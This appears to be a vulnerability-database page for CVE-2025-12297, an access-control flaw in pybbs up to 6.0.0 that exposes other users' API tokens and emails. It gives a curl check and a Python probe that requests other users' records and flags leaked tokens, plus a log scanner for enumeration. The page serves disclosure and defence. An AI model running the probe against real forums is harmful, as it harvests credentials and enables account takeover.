CVE-2025-12297
BaseFortify

Publication date: 2025-10-27

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability was detected in atjiu pybbs up to 6.0.0. This affects an unknown function of the file UserApiController.java. The manipulation results in information disclosure. The attack may be launched remotely. The exploit is now public and may be used.
Meta Information
Generated: 2026-05-07
AI Q&A: 2025-10-27
EPSS evaluated: 2026-05-05
External references: NVD, EUVD
Affected Vendors & Products (1 associated CPE)
Vendor: pybbs_project
Product: pybbs
Version / Range: up to and including 6.0.0
CWE ID: CWE-284
Description: The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

CWE ID: CWE-200
Description: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

CWE ID: NVD-CWE-noinfo
Description: NVD placeholder; NVD has not classified the weakness with a specific CWE.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2025-12297 is an information disclosure vulnerability in atjiu pybbs up to and including version 6.0.0. It lies in UserApiController.java, in the handler for GET /api/user/{username}. Any authenticated user can request another user's record simply by supplying that user's name, and the response includes sensitive attributes such as the target's API token and email address. The handler checks that the caller is logged in but not that the caller is entitled to the record requested, which is why the issue is classed as improper access control (CWE-284) leading to information exposure (CWE-200). Because the token is what the API uses to authenticate a user, an attacker who retrieves it can potentially act as that user. The flaw is remotely exploitable and a public proof of concept is available. [2, 3]


How can this vulnerability impact me?

This vulnerability leads to unauthorized disclosure of sensitive user information, including authentication tokens and email addresses. Any authenticated attacker can exploit it to obtain another user's token, which allows them to impersonate that user and gain access to that user's account and data. Note that the attacker needs nothing more than an ordinary account: on a public forum, registering one is usually enough. The result is a loss of user privacy and an elevated risk of account takeover and follow-on abuse within the affected system. [2, 3]


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability results in unauthorized disclosure of personal data such as email addresses, together with authentication tokens, which conflicts with confidentiality requirements under regulations like GDPR and HIPAA. Such a disclosure can amount to non-compliance with data protection standards that mandate safeguarding personal data against unauthorized access. Organizations running the affected software may face legal and regulatory consequences if the vulnerability is exploited and personal data is compromised. [2, 3]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

The vulnerability can be confirmed by testing the GET /api/user/{username} endpoint of a pybbs instance at version 6.0.0 or earlier. Authenticate as an ordinary, low-privileged user, then request the records of other usernames and inspect the responses. With curl or a similar HTTP client, for example: curl -i -H "Authorization: Bearer <valid_token>" https://<target>/api/user/<username>. Two caveats: first, the authentication header shown here is illustrative, so use whatever header or parameter your deployment actually accepts for its API token; second, compare only records of users other than the one you authenticated as, since your own record legitimately contains your own token and email. If a response for another user's name carries that user's token or email address, the instance is vulnerable. [2]
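
The check above, scripted so that it can be run against a list of usernames and so that the decision logic can be tested offline. This is an added example, not code from BaseFortify or from the pybbs project. It assumes that the API wraps its payload as {"code": ..., "detail": {...}} (it falls back to a bare object), that the user record carries the fields "username", "email" and "token", and that the caller supplies whatever authentication header the deployment expects; the sample responses at the bottom are constructed for the example, not captured from a real server.

```python
"""Probe a pybbs instance for the over-exposed user record behind CVE-2025-12297.

Added example, not code from BaseFortify or from the pybbs project.
Assumptions: response envelope {"code": .., "detail": {..}}, record field
names "username"/"email"/"token", and a caller-supplied auth header.
"""
import json
import urllib.request
from urllib.parse import quote

# Fields a caller must never receive for a user other than themselves.
SENSITIVE_FIELDS = ("token", "email")  # assumed property names


def extract_user_record(body):
    """Unwrap the assumed envelope; accept a bare user object as well."""
    if isinstance(body, dict) and isinstance(body.get("detail"), dict):
        return body["detail"]
    return body if isinstance(body, dict) else {}


def leaked_fields(record, own_username):
    """Sensitive fields present in a record that belongs to someone else.

    The caller's own record legitimately contains their token and email,
    so it is ignored; only other users' records count as a finding.
    Empty or null values are not treated as a leak.
    """
    if record.get("username") == own_username:
        return []
    return [f for f in SENSITIVE_FIELDS if record.get(f) not in (None, "")]


def assess(responses, own_username):
    """Map each probed username to the list of fields its record leaked."""
    return {
        name: leaked_fields(extract_user_record(body), own_username)
        for name, body in responses.items()
    }


def probe(base_url, headers, own_username, usernames, timeout=10):
    """Live version: fetch GET /api/user/{username} for each name and assess.

    `headers` carries the deployment's API authentication, for example
    {"Authorization": "Bearer <token>"} as in the curl line above; a given
    pybbs deployment may expect a different header name (assumption).
    """
    responses = {}
    for name in usernames:
        url = f"{base_url.rstrip('/')}/api/user/{quote(name)}"
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            responses[name] = json.load(resp)
    return assess(responses, own_username)


# Constructed sample responses (not captured from a real server). "alice" is
# the authenticated caller; "bob" shows the vulnerable shape; "carol" shows a
# record that exposes nothing sensitive.
SAMPLE_RESPONSES = {
    "alice": {"code": 200, "description": "ok", "detail": {
        "username": "alice", "email": "alice@example.org",
        "token": "tok-alice", "score": 10}},
    "bob": {"code": 200, "description": "ok", "detail": {
        "username": "bob", "email": "bob@example.org", "token": "tok-bob"}},
    "carol": {"code": 200, "description": "ok", "detail": {
        "username": "carol", "score": 3}},
}


if __name__ == "__main__":
    for name, fields in assess(SAMPLE_RESPONSES, "alice").items():
        print(f"{name}: {'LEAKS ' + ', '.join(fields) if fields else 'ok'}")
```

Run it offline as shown to see the decision logic on the constructed responses; for a real test call probe() with the base URL, the authentication header your deployment uses, your own username and a short list of other usernames, and treat any non-empty result as confirmation.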


What immediate steps should I take to mitigate this vulnerability?

No countermeasures or mitigations are recorded for this vulnerability on this page, and no fixed version is listed; check the upstream pybbs repository for a release that corrects the endpoint before deciding to replace the product. The recorded recommendation is to replace the affected pybbs product (versions up to and including 6.0.0) with an alternative that is not vulnerable. Until a fix is in place, restrict access to the /api/user/{username} endpoint (for example at the reverse proxy) to the clients that genuinely need it, and monitor for suspicious access patterns such as a single client reading many different users' records in a short time. Because the exposed data includes authentication tokens, treat the tokens of any user whose record may already have been read as compromised and rotate them once the endpoint is fixed. [3]
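
The monitoring suggested above, as an added example that is not part of the BaseFortify page or the pybbs project: it scans a reverse-proxy access log for clients that successfully read many distinct user records through GET /api/user/{username} within a short window, which is the pattern a harvesting run against this endpoint leaves behind. It assumes Combined/Common Log Format lines; the log lines embedded below are constructed for the example, not captured from a real server, and the threshold and window are starting values to tune.

```python
"""Flag clients enumerating GET /api/user/{username} in an access log.

Added example, not from BaseFortify or the pybbs project. Assumes the
reverse proxy in front of pybbs writes Common/Combined Log Format lines.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format prefix: client, ident, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /api/user/(?P<user>[^/ ?"]+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log, not a real capture. 203.0.113.7 walks through six
# usernames in 15 seconds (one lookup 404s); 198.51.100.2 looks like a normal
# user re-reading two profiles.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Oct/2025:10:00:01 +0000] "GET /api/user/alice HTTP/1.1" 200 512
203.0.113.7 - - [27/Oct/2025:10:00:03 +0000] "GET /api/user/bob HTTP/1.1" 200 498
203.0.113.7 - - [27/Oct/2025:10:00:05 +0000] "GET /api/user/carol HTTP/1.1" 200 501
203.0.113.7 - - [27/Oct/2025:10:00:08 +0000] "GET /api/user/dave HTTP/1.1" 200 477
203.0.113.7 - - [27/Oct/2025:10:00:10 +0000] "GET /api/user/nobody HTTP/1.1" 404 61
203.0.113.7 - - [27/Oct/2025:10:00:12 +0000] "GET /api/user/erin HTTP/1.1" 200 503
203.0.113.7 - - [27/Oct/2025:10:00:15 +0000] "GET /api/user/frank HTTP/1.1" 200 490
198.51.100.2 - - [27/Oct/2025:10:01:00 +0000] "GET /api/user/alice HTTP/1.1" 200 512
198.51.100.2 - - [27/Oct/2025:10:01:30 +0000] "GET /api/user/bob HTTP/1.1" 200 498
198.51.100.2 - - [27/Oct/2025:10:02:00 +0000] "GET /api/user/alice HTTP/1.1" 200 512
198.51.100.2 - - [27/Oct/2025:10:03:00 +0000] "GET /topic/1 HTTP/1.1" 200 8042
""".splitlines()


def parse_user_lookup(line):
    """Return (client_ip, timestamp, username, status) for a /api/user/ hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["user"], int(m["status"])


def enumeration_suspects(lines, threshold=5, window=timedelta(minutes=5)):
    """Clients that successfully read >= threshold distinct records inside one window.

    Only 2xx responses count: a 404 for a name that does not exist leaks
    nothing. A sliding window over each client's sorted hits catches bursts
    even when they are spread over a long log. Returns
    {client_ip: most distinct usernames seen in any single window}.
    """
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_user_lookup(line)
        if parsed and 200 <= parsed[3] < 300:
            hits[parsed[0]].append((parsed[1], parsed[2]))

    suspects = {}
    for ip, events in hits.items():
        events.sort()
        left = 0
        for right, (ts, _) in enumerate(events):
            while ts - events[left][0] > window:
                left += 1
            distinct = len({u for _, u in events[left:right + 1]})
            if distinct >= threshold:
                suspects[ip] = max(distinct, suspects.get(ip, 0))
    return suspects


if __name__ == "__main__":
    for ip, count in enumeration_suspects(SAMPLE_LOG).items():
        print(f"{ip}: read {count} distinct user records within 5 minutes")
```

Feed it the real log with something like enumeration_suspects(open("/var/log/nginx/access.log")) and alert on any client it returns; a legitimate forum user rarely reads more than a handful of distinct profiles through the API in five minutes, while a harvesting run touches one record per registered username.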

